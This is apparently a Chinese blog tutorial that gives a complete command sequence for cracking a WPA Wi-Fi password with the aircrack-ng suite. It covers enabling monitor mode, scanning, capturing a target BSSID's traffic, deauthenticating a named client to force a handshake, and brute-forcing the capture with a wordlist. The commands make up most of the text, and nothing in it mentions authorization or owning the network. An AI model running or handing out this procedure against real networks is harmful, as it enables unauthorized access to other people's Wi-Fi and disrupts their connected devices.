支持监听模式的无线网卡
我这里使用的是rt3070 一般8187和3070的网卡都可以开启监听模式。
1.网卡开启监听模式
代码语言:javascript复制⚡/home/da1sy # airmon-ng start wlan1
开启监听模式后网卡名子后坠都会更改为mon
2.搜索广播中的WIFI
代码语言:javascript复制⚡/home/da1sy # airodump-ng -a wlan1mon
3.对指定的网络进行抓包
代码语言:javascript复制⚡/home/da1sy/wifi # airodump-ng -w add --bssid 34:96:72:9B:73:7F -c 7 wlan1mon
-w是要保存的包名,–bssid是目标网络的MAC地质,-c是该网络的信道
如果抓不到握手包,就用下面命令让目标重新连接网络
代码语言:javascript复制⚡/home/da1sy/wifi # aireplay-ng -0 5 -a 34:96:72:9B:73:7F -c 9C:2E:A1:E8:BC:B7 wlan1mon
如果出现 WPA handshake:34:96:72:9B:73:7F 就是已经抓到了握握手包,可以继续下一步操作
4.开始暴力破解
代码语言:javascript复制⚡/home/da1sy/wifi # aircrack-ng -w /media/da1sy/软件/DA1SY/password/supper955.txt add-01.cap
-w后面跟的是字典文件,最后面是抓到的包名
最后就是坐等成功,这个猜解的快慢取决于GPU的运算能力
成功截图
